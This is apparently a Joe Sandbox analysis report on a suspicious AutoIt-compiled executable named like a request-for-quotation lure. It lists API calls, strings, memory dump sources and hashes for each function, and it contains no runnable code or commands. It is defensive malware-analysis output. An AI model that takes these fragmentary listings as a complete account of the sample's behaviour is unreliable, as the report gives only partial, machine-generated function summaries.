Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
IsWow64Process.KERNEL32(00000000), ref: 00404AA1
GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
FreeLibrary.KERNEL32(00000000), ref: 00404AF2
GetSystemInfo.KERNEL32(00000000), ref: 00404B23
GetSystemInfo.KERNEL32(00000000), ref: 00404B2F

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E

Function 00404E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F

Strings

SCRIPT, xrefs: 00404EA6

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665

Function 0040FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

%, xrefs: 004449B9
%I, xrefs: 0040FCF3

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: BuffCharUpper
String ID: %$%I
API String ID: 3964851224-3058261900
Opcode ID: 00ed509fc03d9b03bfe68998738051d25154e1b4eada985af7c21d037ecb1067
Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
Opcode Fuzzy Hash: 00ed509fc03d9b03bfe68998738051d25154e1b4eada985af7c21d037ecb1067
Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A

Function 0040E6A0 Relevance: 8.6, Strings: 6, Instructions: 1102COMMON

Download Yara Rule

Strings

DdL, xrefs: 00443AF5
Variable must be of type 'Object'., xrefs: 00443E62
%, xrefs: 0040EA84, 0040EB29, 0040EB37, 0040EB45, 0040EB59, 0040EEF4, 0040EF02, 0040EF2A, 0040EF32, 0040EF90, 0040EF98, 0040EFB7, 0040EFC5, 00443B47
DdL, xrefs: 00443B2E
DdL, xrefs: 0040EAC1
DdL, xrefs: 0040EABA

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID:
String ID: %$DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
API String ID: 0-424349088
Opcode ID: 9c7de32c11f541e08c1102b3f1b113d928d24f1b490eeab84d8050e4c2ea4161
Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
Opcode Fuzzy Hash: 9c7de32c11f541e08c1102b3f1b113d928d24f1b490eeab84d8050e4c2ea4161
Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99

Function 0046445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
FindFirstFileW.KERNEL32(?,?), ref: 0046447B
FindClose.KERNEL32(00000000), ref: 0046448B

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F

Function 004109D0 Relevance: 59.0, APIs: 27, Strings: 6, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
timeGetTime.WINMM ref: 00410D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
Sleep.KERNEL32(0000000A), ref: 00410E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
DestroyWindow.USER32 ref: 00410F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
TranslateMessage.USER32(?), ref: 00445C60
DispatchMessageW.USER32(?), ref: 00445C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82

Strings

@COM_EVENTOBJ, xrefs: 004454F0
@GUI_CTRLID, xrefs: 00444F3A
%, xrefs: 00444F59, 00444FAE, 00445003, 004457B4
@GUI_CTRLHANDLE, xrefs: 00444FE4
@GUI_WINHANDLE, xrefs: 00444F8F
@TRAY_ID, xrefs: 0044578F

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: %$@COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-2752490676
Opcode ID: 6a04067c4a1f6b73516e56ecc44c7f7504fb8ede6fef070ef3e4439dc9617396
Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
Opcode Fuzzy Hash: 6a04067c4a1f6b73516e56ecc44c7f7504fb8ede6fef070ef3e4439dc9617396
Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A

Function 00B98550 Relevance: 21.5, APIs: 14, Instructions: 544COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00B97FD4
FreeSid.ADVAPI32(?), ref: 00B98579

Memory Dump Source

Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ErrorFreeLast
String ID:
API String ID: 1762890227-0
Opcode ID: 967d7c1d16dd6dbd9b9f392e34917eb0cbad5d21a40852bdac76c6764a6edf78
Instruction ID: 5b45c3b217dcc1746ea3d538418c29857c74580bfdf6ec00a9f31328435d333d
Opcode Fuzzy Hash: 967d7c1d16dd6dbd9b9f392e34917eb0cbad5d21a40852bdac76c6764a6edf78
Instruction Fuzzy Hash: E2F1262195C3809FCF365B288C48B353AE4EF77760F5C06FAE455A61F2EE658C089266

Function 00469155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69

Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD

__wsplitpath.LIBCMT ref: 00469234

Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B

_wcscpy.LIBCMT ref: 00469247
_wcscat.LIBCMT ref: 0046925A
__wsplitpath.LIBCMT ref: 0046927F
_wcscat.LIBCMT ref: 00469295
_wcscat.LIBCMT ref: 004692A8

Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED

_wcscmp.LIBCMT ref: 004691EF

Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
_wcsncpy.LIBCMT ref: 004694C5
DeleteFileW.KERNEL32(?,?), ref: 004694FB
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 1fdc1389585ee25c9ba0c3a9ed97a450cce0af2ebfbc5111a641a9f349b24362
Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
Opcode Fuzzy Hash: 1fdc1389585ee25c9ba0c3a9ed97a450cce0af2ebfbc5111a641a9f349b24362
Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69

Function 00403015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00403074
RegisterClassExW.USER32(00000030), ref: 0040309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
InitCommonControlsEx.COMCTL32(?), ref: 004030CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
LoadIconW.USER32(000000A9), ref: 004030F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101

Strings

TaskbarCreated, xrefs: 004030A4
AutoIt v3 GUI, xrefs: 00403090
0, xrefs: 00403056
+, xrefs: 0040305D

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69

Function 00403041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00403074
RegisterClassExW.USER32(00000030), ref: 0040309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
InitCommonControlsEx.COMCTL32(?), ref: 004030CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
LoadIconW.USER32(000000A9), ref: 004030F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101

Strings

TaskbarCreated, xrefs: 004030A4
AutoIt v3 GUI, xrefs: 00403090
0, xrefs: 00403056
+, xrefs: 0040305D

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9

Function 0040708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724

Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
RegCloseKey.ADVAPI32(?), ref: 0043E947
_wcscat.LIBCMT ref: 0043E9A0

Strings

\, xrefs: 0043E9C3
Include, xrefs: 0043E8BF, 0043E900
\Include\, xrefs: 00407165
Software\AutoIt v3\AutoIt, xrefs: 0040719E

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 133e3e37f574de517d09904d6d121d229fd4917e6981f68f0fa09f99abbafb76
Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
Opcode Fuzzy Hash: 133e3e37f574de517d09904d6d121d229fd4917e6981f68f0fa09f99abbafb76
Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A

Function 00403633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
KillTimer.USER32(?,00000001), ref: 004036FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
CreatePopupMenu.USER32 ref: 0040373E
PostQuitMessage.USER32(00000000), ref: 0040374D

Strings

TaskbarCreated, xrefs: 00403725
%I, xrefs: 0043D081, 0043D0CF

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%I
API String ID: 129472671-1195164674
Opcode ID: d085891fbce4ac700e19f77706549dbb7e8c65c9ecaa69f5eff41dbd37e5b37c
Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
Opcode Fuzzy Hash: d085891fbce4ac700e19f77706549dbb7e8c65c9ecaa69f5eff41dbd37e5b37c
Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E

Function 00403A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00403A50
LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
LoadIconW.USER32(00000063), ref: 00403A76
LoadIconW.USER32(000000A4), ref: 00403A88
LoadIconW.USER32(000000A2), ref: 00403A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
RegisterClassExW.USER32(?), ref: 00403B16

Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101

Strings

0, xrefs: 00403AF4
#, xrefs: 00403AFB
AutoIt v3, xrefs: 00403B05

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88

Function 00B7CE90 Relevance: 16.2, APIs: 10, Instructions: 1202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df828dda9fd2e6eed5403f1f1154ef51b8e7a1121e93c144bef9ba3ce8889fed
Instruction ID: c6e86abc02fd9118b8950c0d9f5b344415d976f033f4d79ab58d34e16bf03818
Opcode Fuzzy Hash: df828dda9fd2e6eed5403f1f1154ef51b8e7a1121e93c144bef9ba3ce8889fed
Instruction Fuzzy Hash: DFA2797190D3808FC735CB18C8447AABBF1EF95398F09C99DE5AC97292D335A9048B97

Function 00403766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

